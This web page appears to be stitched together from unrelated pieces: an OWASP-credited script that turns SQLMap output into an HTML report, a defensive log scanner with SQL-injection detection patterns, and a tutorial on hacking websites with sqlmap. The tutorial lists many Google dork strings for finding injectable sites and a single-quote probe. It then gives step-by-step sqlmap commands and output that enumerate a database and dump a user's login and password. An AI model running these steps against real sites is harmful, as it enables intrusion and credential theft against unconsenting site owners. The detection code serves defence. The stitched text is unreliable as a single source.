the stdout of the command line (redirected to "/tmp/scan_out.txt" in the
SQLMap command line):
<br />
<pre>###########################################
# Script to generate a HTML report from a
# SQLMap stdout output
#
# Author : Dominique Righetto
#          dominique.righetto@owasp.org
# Date   : March 2012
###########################################
import html
import sys

#I/O paths, take SQLMap STDOUT file from script parameter
stdout_file_path = sys.argv[1]
report_file_path = stdout_file_path + ".html"
#Flag to know if global audit is OK
cannot_find_injectable_parameter = False
#Open STDOUT file in read mode and REPORT file in write mode
with open(stdout_file_path, "r") as file_handle_read, \
     open(report_file_path, "w") as file_handle_write:
    #Initialize HTML report stream
    file_handle_write.write("<html xmlns=\"http://www.w3.org/1999/xhtml\" lang=\"en\" xml:lang=\"en\">")
    file_handle_write.write("<head><link rel=\"StyleSheet\" href=\"style.css\" type=\"text/css\" media=\"screen\" /><title>SQLMap HTML Report</title></head>")
    file_handle_write.write("<body><table id=\"myStyle\">")
    file_handle_write.write("<thead><tr><th scope=\"col\">Test datetime</th><th scope=\"col\">Test description</th></tr></thead>")
    file_handle_write.write("<tbody>")
    #Read STDOUT file line by line
    for line in file_handle_read:
        if (line.strip().startswith("[")) and (line.find("[*]") == -1):
            #Check for special message indicating audit global status
            if (line.lower().find("all parameters are not injectable") > -1):
                cannot_find_injectable_parameter = True
            #Report generation
            line_part = line.strip().split(" ")
            #Skip lines too short to carry a "[time] [LEVEL] testing ..." message
            if (len(line_part) > 2) and (line_part[2].lower() == "testing"):
                #Extract useful informations
                execution_datatime = line_part[0]
                execution_trace = " ".join(line_part[2:])
                #Write report HTML line, escaping the scan output so it cannot inject markup
                file_handle_write.write("<tr><td>" + html.escape(execution_datatime) + "</td><td>" + html.escape(execution_trace) + "</td></tr>")
    file_handle_write.write("</tbody></table>")
    #Write global audit status line
    if (cannot_find_injectable_parameter):
        file_handle_write.write("<h1 class=\"success\">SQLMap cannot find injectable parameters !</h1>")
    else:
        file_handle_write.write("<h1 class=\"fail\">SQLMap can find injectable parameters !</h1>")
    #Finalize report HTML stream
    file_handle_write.write("</body></html>")
#Both I/O streams are closed when the with block ends
#Print some informations
print("Report generated to " + report_file_path)
</pre>
To generate the report use the command line below:
<br />
<pre>python SQMReportGenerator.py /tmp/scan_out.txt
</pre>
The report will be generated in the same location as the input
file, using the source file name with an added ".html" extension as the report name.
<br />
The script uses an external CSS file named "style.css" (located in the same location as the report) to format the report.
<br />
A CSS sample is available below:
<br />
<pre>body
{
line-height: 1.6em;
}
.success
{
font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
text-align: center;
color: green;
}
.fail
{
font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
text-align: center;
color: red;
}
#myStyle
{
font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;
font-size: 12px;
margin: 45px;
width: 75%;
text-align: left;
border-collapse: collapse;
border: 1px solid #6cf;
}
#myStyle th
{
padding: 20px;
font-weight: normal;
font-size: 13px;
color: #039;
text-transform: uppercase;
text-align: center;
border-right: 1px solid #0865c2;
border-top: 1px solid #0865c2;
border-left: 1px solid #0865c2;
border-bottom: 1px solid #fff;
}
#myStyle td
{
padding: 10px 20px;
color: #669;
border-right: 1px dashed #6cf;
}
</pre>
Example of generated report:
<br />
<a class="image" href="https://www.owasp.org/index.php/File:SQLMapExampleReport.png"><img alt="SQLMapExampleReport.png" height="679" src="https://www.owasp.org/images/d/d9/SQLMapExampleReport.png" style="vertical-align: bottom;" width="1428" /></a>
<br />
<h2>
<span class="mw-headline" id="Remark_about_scan_scheduling">Remark about scan scheduling</span></h2>
The scan takes a while, so it is recommended to schedule its execution:
<br />
<ul>
<li> During the night for a daily audit case.
</li>
<li> During the week-end for a weekly audit case. </li>
</ul>
<br />
If you are looking for a practical example, this is a good one:<br />
<br />
<br />
<h2>
<span id="What_is_SQLMAP"><span style="color: #993300;">What is SQLMAP</span></span></h2>
sqlmap
is an open source penetration testing tool that automates the process
of detecting and exploiting SQL injection flaws and taking over of
database servers. It comes with a powerful detection engine, many niche
features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.<br />
<br />
<h3>
<span id="Features"><span style="color: #993300;">Features</span></span></h3>
<ol>
<li>Full
support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database
management systems.</li>
<li>Full support for six SQL injection
techniques: boolean-based blind, time-based blind, error-based, UNION
query, stacked queries and out-of-band.</li>
<li>Support to directly
connect to the database without passing via a SQL injection, by
providing DBMS credentials, IP address, port and database name.</li>
<li>Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.</li>
<li>Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.</li>
<li>Support
to dump database tables entirely, a range of entries or specific
columns as per user’s choice. The user can also choose to dump only a
range of characters from each column’s entry.</li>
<li>Support to search
for specific database names, specific tables across all databases or
specific columns across all databases’ tables. This is useful, for
instance, to identify tables containing custom application credentials
where relevant columns’ names contain string like name and pass.</li>
<li>Support
to download and upload any file from the database server underlying
file system when the database software is MySQL, PostgreSQL or Microsoft
SQL Server.</li>
<li>Support to execute arbitrary commands and retrieve
their standard output on the database server underlying operating system
when the database software is MySQL, PostgreSQL or Microsoft SQL
Server.</li>
<li>Support to establish an out-of-band stateful TCP
connection between the attacker machine and the database server
underlying operating system. This channel can be an interactive command
prompt, a Meterpreter session or a graphical user interface (VNC)
session as per user’s choice.</li>
<li>Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.</li>
</ol>
[Source: www.sqlmap.org]<br />
Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make ends meet. Your actions might impact someone in a way you never wished for. I think I can’t make it any clearer.<br />
So here goes:<br />
<br />
<h2>
<span id="Step_1_Find_a_Vulnerable_Website"><span style="color: #993300;">Step 1: Find a Vulnerable Website</span></span></h2>
This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don’t, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.<br />
<br />
<h3>
<span id="Step_1a_Google_Dorks_strings_to_find_Vulnerable_SQLMAP_SQL_injectable_website"><span style="color: #993300;">Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website</span></span></h3>
This list is really long. It took me a long time to collect them. If you know SQL, then you can add more here. Put them in the comment section and I will add them here.<br />
<br />
<table class="tg"><tbody>
<tr><th class="tg-031e" style="text-align: left;">Google Dork string Column 1</th><th class="tg-031e" style="text-align: left;">Google Dork string Column 2</th><th class="tg-031e" style="text-align: left;">Google Dork string Column 3</th></tr>
<tr><td class="tg-vn4c">inurl:item_id=</td><td class="tg-vn4c">inurl:review.php?id=</td><td class="tg-vn4c">inurl:hosting_info.php?id=</td></tr>
<tr><td class="tg-031e">inurl:newsid=</td><td class="tg-031e">inurl:iniziativa.php?in=</td><td class="tg-031e">inurl:gallery.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:trainers.php?id=</td><td class="tg-vn4c">inurl:curriculum.php?id=</td><td class="tg-vn4c">inurl:rub.php?idr=</td></tr>
<tr><td class="tg-031e">inurl:news-full.php?id=</td><td class="tg-031e">inurl:labels.php?id=</td><td class="tg-031e">inurl:view_faq.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:news_display.php?getid=</td><td class="tg-vn4c">inurl:story.php?id=</td><td class="tg-vn4c">inurl:artikelinfo.php?id=</td></tr>
<tr><td class="tg-031e">inurl:index2.php?option=</td><td class="tg-031e">inurl:look.php?ID=</td><td class="tg-031e">inurl:detail.php?ID=</td></tr>
<tr><td class="tg-vn4c">inurl:readnews.php?id=</td><td class="tg-vn4c">inurl:newsone.php?id=</td><td class="tg-vn4c">inurl:index.php?=</td></tr>
<tr><td class="tg-031e">inurl:top10.php?cat=</td><td class="tg-031e">inurl:aboutbook.php?id=</td><td class="tg-031e">inurl:profile_view.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:newsone.php?id=</td><td class="tg-vn4c">inurl:material.php?id=</td><td class="tg-vn4c">inurl:category.php?id=</td></tr>
<tr><td class="tg-031e">inurl:event.php?id=</td><td class="tg-031e">inurl:opinions.php?id=</td><td class="tg-031e">inurl:publications.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:product-item.php?id=</td><td class="tg-vn4c">inurl:announce.php?id=</td><td class="tg-vn4c">inurl:fellows.php?id=</td></tr>
<tr><td class="tg-031e">inurl:sql.php?id=</td><td class="tg-031e">inurl:rub.php?idr=</td><td class="tg-031e">inurl:downloads_info.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:index.php?catid=</td><td class="tg-vn4c">inurl:galeri_info.php?l=</td><td class="tg-vn4c">inurl:prod_info.php?id=</td></tr>
<tr><td class="tg-031e">inurl:news.php?catid=</td><td class="tg-031e">inurl:tekst.php?idt=</td><td class="tg-031e">inurl:shop.php?do=part&id=</td></tr>
<tr><td class="tg-vn4c">inurl:index.php?id=</td><td class="tg-vn4c">inurl:newscat.php?id=</td><td class="tg-vn4c">inurl:productinfo.php?id=</td></tr>
<tr><td class="tg-031e">inurl:news.php?id=</td><td class="tg-031e">inurl:newsticker_info.php?idn=</td><td class="tg-031e">inurl:collectionitem.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:index.php?id=</td><td class="tg-vn4c">inurl:rubrika.php?idr=</td><td class="tg-vn4c">inurl:band_info.php?id=</td></tr>
<tr><td class="tg-031e">inurl:trainers.php?id=</td><td class="tg-031e">inurl:rubp.php?idr=</td><td class="tg-031e">inurl:product.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:buy.php?category=</td><td class="tg-vn4c">inurl:offer.php?idf=</td><td class="tg-vn4c">inurl:releases.php?id=</td></tr>
<tr><td class="tg-031e">inurl:article.php?ID=</td><td class="tg-031e">inurl:art.php?idm=</td><td class="tg-031e">inurl:ray.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:play_old.php?id=</td><td class="tg-vn4c">inurl:title.php?id=</td><td class="tg-vn4c">inurl:produit.php?id=</td></tr>
<tr><td class="tg-031e">inurl:declaration_more.php?decl_id=</td><td class="tg-031e">inurl:news_view.php?id=</td><td class="tg-031e">inurl:pop.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:pageid=</td><td class="tg-vn4c">inurl:select_biblio.php?id=</td><td class="tg-vn4c">inurl:shopping.php?id=</td></tr>
<tr><td class="tg-031e">inurl:games.php?id=</td><td class="tg-031e">inurl:humor.php?id=</td><td class="tg-031e">inurl:productdetail.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:page.php?file=</td><td class="tg-vn4c">inurl:aboutbook.php?id=</td><td class="tg-vn4c">inurl:post.php?id=</td></tr>
<tr><td class="tg-031e">inurl:newsDetail.php?id=</td><td class="tg-031e">inurl:ogl_inet.php?ogl_id=</td><td class="tg-031e">inurl:viewshowdetail.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:gallery.php?id=</td><td class="tg-vn4c">inurl:fiche_spectacle.php?id=</td><td class="tg-vn4c">inurl:clubpage.php?id=</td></tr>
<tr><td class="tg-031e">inurl:article.php?id=</td><td class="tg-031e">inurl:communique_detail.php?id=</td><td class="tg-031e">inurl:memberInfo.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:show.php?id=</td><td class="tg-vn4c">inurl:sem.php3?id=</td><td class="tg-vn4c">inurl:section.php?id=</td></tr>
<tr><td class="tg-031e">inurl:staff_id=</td><td class="tg-031e">inurl:kategorie.php4?id=</td><td class="tg-031e">inurl:theme.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:newsitem.php?num=</td><td class="tg-vn4c">inurl:news.php?id=</td><td class="tg-vn4c">inurl:page.php?id=</td></tr>
<tr><td class="tg-031e">inurl:readnews.php?id=</td><td class="tg-031e">inurl:index.php?id=</td><td class="tg-031e">inurl:shredder-categories.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:top10.php?cat=</td><td class="tg-vn4c">inurl:faq2.php?id=</td><td class="tg-vn4c">inurl:tradeCategory.php?id=</td></tr>
<tr><td class="tg-031e">inurl:historialeer.php?num=</td><td class="tg-031e">inurl:show_an.php?id=</td><td class="tg-031e">inurl:product_ranges_view.php?ID=</td></tr>
<tr><td class="tg-vn4c">inurl:reagir.php?num=</td><td class="tg-vn4c">inurl:preview.php?id=</td><td class="tg-vn4c">inurl:shop_category.php?id=</td></tr>
<tr><td class="tg-031e">inurl:Stray-Questions-View.php?num=</td><td class="tg-031e">inurl:loadpsb.php?id=</td><td class="tg-031e">inurl:transcript.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:forum_bds.php?num=</td><td class="tg-vn4c">inurl:opinions.php?id=</td><td class="tg-vn4c">inurl:channel_id=</td></tr>
<tr><td class="tg-031e">inurl:game.php?id=</td><td class="tg-031e">inurl:spr.php?id=</td><td class="tg-031e">inurl:aboutbook.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:view_product.php?id=</td><td class="tg-vn4c">inurl:pages.php?id=</td><td class="tg-vn4c">inurl:preview.php?id=</td></tr>
<tr><td class="tg-031e">inurl:newsone.php?id=</td><td class="tg-031e">inurl:announce.php?id=</td><td class="tg-031e">inurl:loadpsb.php?id=</td></tr>
<tr><td class="tg-vn4c">inurl:sw_comment.php?id=</td><td class="tg-vn4c">inurl:clanek.php4?id=</td><td class="tg-vn4c">inurl:pages.php?id=</td></tr>
<tr><td class="tg-031e">inurl:news.php?id=</td><td class="tg-031e">inurl:participant.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:avd_start.php?avd=</td><td class="tg-vn4c">inurl:download.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:event.php?id=</td><td class="tg-031e">inurl:main.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:product-item.php?id=</td><td class="tg-vn4c">inurl:review.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:sql.php?id=</td><td class="tg-031e">inurl:chappies.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:material.php?id=</td><td class="tg-vn4c">inurl:read.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:clanek.php4?id=</td><td class="tg-031e">inurl:prod_detail.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:announce.php?id=</td><td class="tg-vn4c">inurl:viewphoto.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:chappies.php?id=</td><td class="tg-031e">inurl:article.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:read.php?id=</td><td class="tg-vn4c">inurl:person.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:viewapp.php?id=</td><td class="tg-031e">inurl:productinfo.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:viewphoto.php?id=</td><td class="tg-vn4c">inurl:showimg.php?id=</td><td class="tg-vn4c"><br /></td></tr>
<tr><td class="tg-031e">inurl:rub.php?idr=</td><td class="tg-031e">inurl:view.php?id=</td><td class="tg-031e"><br /></td></tr>
<tr><td class="tg-vn4c">inurl:galeri_info.php?l=</td><td class="tg-vn4c">inurl:website.php?id=</td><td class="tg-vn4c"><br /></td></tr>
</tbody></table>
<br />
<h3>
<span id="Step_1b_Initial_check_to_confirm_if_website_is_vulnerable_to_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection</span></span></h3>
For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways and I am sure people would argue which one is best, but to me the following is the simplest and most conclusive.<br />
Let’s say you searched using this string <code> inurl:item_id= </code> and one of the search result shows a website like this:<br />
<pre>http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15</pre>
Just add a single quotation mark <code> ' </code> at the end of the URL. (Just to ensure, <code> " </code> is a double quotation mark and <code> ' </code> is a single quotation mark).<br />
So now your URL will become like this:<br />
<pre>http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'</pre>
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results page.<br />
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1" class="alignnone size-full wp-image-177" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1014x461xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-1.jpg.pagespeed.ic.-og6L92oU1.jpg" height="461" width="1014" /></a><br />
Examples of SQLi Errors from Different Databases and Languages<br />
<h4>
<span id="Microsoft_SQL_Server"><span style="color: #993300;">Microsoft SQL Server</span></span></h4>
<code>Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.</code><br />
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.<br />
<code>Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.</code><br />
<br />
<h4>
<span id="MySQL_Errors"><span style="color: #993300;">MySQL Errors</span></span></h4>
<code>Warning:
mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/myawesomestore.com/buystuff.php on line 12</code><br />
<code>Error:
You have an error in your SQL syntax: check the manual that corresponds
to your MySQL server version for the right syntax to use near ‘’’ at
line 12</code><br />
<br />
<h4>
<span id="Oracle_Errors"><span style="color: #993300;">Oracle Errors</span></span></h4>
<code>java.sql.SQLException:
ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)</code><br />
<code>Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated</code><br />
<br />
<h4>
<span id="PostgreSQL_Errors"><span style="color: #993300;">PostgreSQL Errors</span></span></h4>
<code>Query failed: ERROR: unterminated quoted string at or near “‘’’”</code><br />
<br />
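From the defending side, the single-quote probe described above and the sqlmap requests used in the steps that follow are visible in web server access logs. The added example below is not part of the original tutorial; it scans constructed combined-format log lines for them, and the sample IP addresses, rule names and function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in Apache/Nginx "combined" format (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [25/Sep/2015:10:55:01 +0530] "GET /cgi-bin/item.cgi?item_id=15 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [25/Sep/2015:10:55:09 +0530] "GET /cgi-bin/item.cgi?item_id=15%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2015:10:55:53 +0530] "GET /cgi-bin/item.cgi?item_id=15%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [25/Sep/2015:10:55:56 +0530] "GET /cgi-bin/item.cgi?item_id=15%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 4988 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.44 - - [25/Sep/2015:10:56:10 +0530] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.0.2.44 - - [25/Sep/2015:10:56:12 +0530] "GET /search?q=o%27reilly+books HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0)"
this line is not in combined format and is skipped
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# A numeric value with a quote glued on: the manual check from Step 1.b.
# A quote inside free text (o'reilly) is normal traffic and must not match.
QUOTE_ON_NUMBER = re.compile(r"""\d+['"]+""")

# SQL fragments that have no business inside a request parameter.
SQL_KEYWORDS = re.compile(
    r"\b(?:union\s+(?:all\s+)?select|information_schema"
    r"|(?:and|or)\s+\d+\s*=\s*\d+|sleep\s*\(|benchmark\s*\()",
    re.IGNORECASE,
)


def inspect_request(target, user_agent, status):
    """Return the sorted list of rule names that one request triggers."""
    rules = set()
    # Any client can send any User-Agent, so this is only a cheap first signal.
    if "sqlmap" in user_agent.lower():
        rules.add("sqlmap-user-agent")
    # parse_qsl URL-decodes values, so %27 and %20 are seen as ' and space.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if QUOTE_ON_NUMBER.fullmatch(value):
            rules.add("quote-on-numeric-param")
        if SQL_KEYWORDS.search(value):
            rules.add("sql-keywords-in-param")
    # A 5xx answer to a probe suggests the input reached the database layer.
    if rules and status >= 500:
        rules.add("error-response-to-probe")
    return sorted(rules)


def analyze(log_text):
    """Return (client_ip, request_target, rules) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not a combined-format line
        rules = inspect_request(match["target"], match["ua"], int(match["status"]))
        if rules:
            findings.append((match["ip"], match["target"], rules))
    return findings


def rules_by_client(findings):
    """Group triggered rule names per client IP for triage."""
    grouped = defaultdict(set)
    for ip, _target, rules in findings:
        grouped[ip].update(rules)
    return dict(grouped)


if __name__ == "__main__":
    for ip, rules in sorted(rules_by_client(analyze(SAMPLE_LOG)).items()):
        print(ip, ", ".join(sorted(rules)))
```

The 500 response to the quote probe is the line to act on first: it marks a parameter whose input reaches the SQL parser and whose error handling leaks to the client.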
<h2>
<span id="Step_2_List_DBMS_databases_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 2: List DBMS databases using SQLMAP SQL Injection</span></span></h2>
As you can see from the screenshot above, I’ve found a website vulnerable to SQLMAP SQL Injection. Now I need to list all the databases on that vulnerable database server (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.<br />
<br />
Run the following command on your vulnerable website:<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs</pre>
In here:<br />
<code>sqlmap </code>= Name of sqlmap binary file<br />
<code>-u </code>= Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)<br />
<code>--dbs </code>= Enumerate DBMS databases<br />
See screenshot below.<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2" class="alignnone size-full wp-image-178" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x868xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-2.jpg.pagespeed.ic.7xPj7haoxb.jpg" height="868" width="1280" /></a><br />
<br />
This command reveals quite a bit of interesting information:<br />
<pre>web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'</pre>
So, we now have two databases that we can look into. <code> information_schema </code> is a standard database for almost every MySQL database. So our interest would be in the <code> sqldummywebsite </code> database.<br />
<br />
<h2>
<span id="Step_3_List_tables_of_target_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 3: List tables of target database using SQLMAP SQL Injection</span></span></h2>
Now we need to know how many tables this <code> sqldummywebsite </code> database has and what their names are. To find out that information, use the following command:<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables</pre>
Sweet, this database has 8 tables.<br />
<pre>[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info</pre>
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3" class="alignnone size-full wp-image-179" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x997xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-3.jpg.pagespeed.ic.LUlsg-pmHr.jpg" height="997" width="1280" /></a><br />
And of course we want to check what’s inside the <code> user_info </code> table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.<br />
<br />
<h2>
<span id="Step_4_List_columns_on_target_table_of_selected_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 4: List columns on target table of selected database using SQLMAP SQL Injection</span></span></h2>
Now we need to list all the columns of the target table <code> user_info </code> of the <code> sqldummywebsite </code> database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy; run the following command:<br />
<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns</pre>
<br />
This returns 5 entries from target table <code> user_info </code> of <code> sqldummywebsite </code> database.<br />
<pre>[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)</pre>
<br />
AHA! This is exactly what we are looking for … target columns <code> user_login </code> and <code> user_password </code>.<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4" class="alignnone size-full wp-image-180" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x997xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-4.jpg.pagespeed.ic.PyB8VcnbX6.jpg" height="997" width="1280" /></a><br />
<br />
<h2>
<span id="Step_5_List_usernames_from_target_columns_of_target_table_of_selected_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection</span></span></h2>
SQLMAP SQL Injection makes it easy! Just run the following command again:<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump</pre>
<br />
Guess what, we now have the username from the database:<br />
<pre>[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes</pre>
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5" class="alignnone size-full wp-image-181" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x907xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-5.jpg.pagespeed.ic.rNofdi-B9v.jpg" height="907" width="1280" /></a><br />
<br />
Almost there, we now only need the password for this user. The next step shows just that.<br />
<br />
<h2>
<span id="Step_6_Extract_password_from_target_columns_of_target_table_of_selected_database_using_SQLMAP_SQL_Injection"><span style="color: #993300;">Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection</span></span></h2>
You’re probably getting used to how to use the SQLMAP SQL Injection tool. Use the following command to extract the password for the user.<br />
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump</pre>
<br />
TADA!! We have the password.<br />
<pre>[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+</pre>
<br />
<a href="http://www.darkmoreops.com/wp-content/uploads/2014/08/use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6.jpg"><img alt="use-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6" class="alignnone size-full wp-image-182" src="http://www.darkmoreops.com/wp-content/uploads/2014/08/1280x939xuse-sqlmap-sql-injection-to-hack-a-website-and-database-blackmore-ops-6.jpg.pagespeed.ic.QMEokYZHKx.jpg" height="939" width="1280" /></a><br />
<br />
But hang on, this password looks funny. This can’t be someone’s password. Someone who leaves their website vulnerable like that just can’t have a password like that.<br />
